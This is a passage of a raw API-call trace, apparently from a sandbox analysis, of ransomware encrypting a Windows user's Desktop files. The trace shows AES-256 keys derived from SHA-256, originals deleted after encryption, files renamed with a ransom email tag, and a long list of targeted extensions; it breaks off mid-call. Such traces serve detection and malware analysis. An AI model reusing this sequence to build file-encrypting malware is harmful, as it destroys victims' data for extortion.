	[0181.461] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0181.461] ReadFile (in: hFile=0x384, lpBuffer=0xfdb130, nNumberOfBytesToRead=0xc98, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdb130*, lpNumberOfBytesRead=0x18c060*=0xc98, lpOverlapped=0x0) returned 1
	[0181.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.464] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb770) returned 1
	[0181.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.466] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0181.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.467] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0181.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.467] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0181.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.467] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xc98, dwBufLen=0xc98 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xca0) returned 1
	[0181.469] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.470] RtlMoveMemory (in: Destination=0xfdd180, Source=0xfdb130, Length=0xc98 | out: Destination=0xfdd180) 
	[0181.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.471] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdd180*, pdwDataLen=0x18bc0c*=0xc98, dwBufLen=0xca0 | out: pbData=0xfdd180*, pdwDataLen=0x18bc0c*=0xca0) returned 1
	[0181.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.471] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0181.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.472] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0181.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.472] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0181.472] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.472] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.473] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0181.474] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 95
	[0181.474] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0181.475] WriteFile (in: hFile=0x388, lpBuffer=0xfdd180*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesWritten=0x18c068*=0xca0, lpOverlapped=0x0) returned 1
	[0181.478] CloseHandle (hObject=0x388) returned 1
	[0181.478] CloseHandle (hObject=0x384) returned 1
	[0181.478] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods")) returned 1
	[0181.482] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods")) returned 0
	[0181.482] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd285ee50, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x444d6b50, ftLastAccessTime.dwHighDateTime=0x1d97661, ftLastWriteTime.dwLowDateTime=0x444d6b50, ftLastWriteTime.dwHighDateTime=0x1d97661, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BeYl_s9Ay -D", cAlternateFileName="BEYL_S~1")) returned 1
	[0181.482] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce9c2cb0, ftCreationTime.dwHighDateTime=0x1d96662, ftLastAccessTime.dwLowDateTime=0x668341a0, ftLastAccessTime.dwHighDateTime=0x1d96cec, ftLastWriteTime.dwLowDateTime=0x668341a0, ftLastWriteTime.dwHighDateTime=0x1d96cec, nFileSizeHigh=0x0, nFileSizeLow=0xb8b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="bL1hC.avi", cAlternateFileName="")) returned 1
	[0181.482] lstrcmpW (lpString1="bL1hC.avi", lpString2="..") returned 1
	[0181.482] lstrcmpW (lpString1="bL1hC.avi", lpString2=".") returned 1
	[0181.482] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.482] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="bL1hC.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bL1hC.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bL1hC.avi"
	[0181.482] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bL1hC.avi") returned 39
	[0181.482] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.483] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bL1hC.avi", cchLength=0x27 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\bl1hc.avi") returned 0x27
	[0181.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.483] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\bl1hc.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.483] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\bl1hc.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\bl1hc.avi") returned="c:\\users\\rdhj0cnfevzx\\desktop\\bl1hc.avi"
	[0181.483] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\bl1hc.avi") returned 39
	[0181.483] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.484] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0181.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.484] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0181.484] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4a98d70, ftCreationTime.dwHighDateTime=0x1d9709a, ftLastAccessTime.dwLowDateTime=0x66d98db0, ftLastAccessTime.dwHighDateTime=0x1d9717b, ftLastWriteTime.dwLowDateTime=0x66d98db0, ftLastWriteTime.dwHighDateTime=0x1d9717b, nFileSizeHigh=0x0, nFileSizeLow=0x9748, dwReserved0=0x0, dwReserved1=0x0, cFileName="bSfE7M1KWByp Y.jpg", cAlternateFileName="BSFE7M~1.JPG")) returned 1
	[0181.484] lstrcmpW (lpString1="bSfE7M1KWByp Y.jpg", lpString2="..") returned 1
	[0181.484] lstrcmpW (lpString1="bSfE7M1KWByp Y.jpg", lpString2=".") returned 1
	[0181.485] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.485] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="bSfE7M1KWByp Y.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bSfE7M1KWByp Y.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bSfE7M1KWByp Y.jpg"
	[0181.485] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bSfE7M1KWByp Y.jpg") returned 48
	[0181.485] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.485] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bSfE7M1KWByp Y.jpg", cchLength=0x30 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg") returned 0x30
	[0181.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.485] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.486] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg") returned="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg"
	[0181.486] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\bsfe7m1kwbyp y.jpg") returned 48
	[0181.486] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.487] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0181.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.487] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") 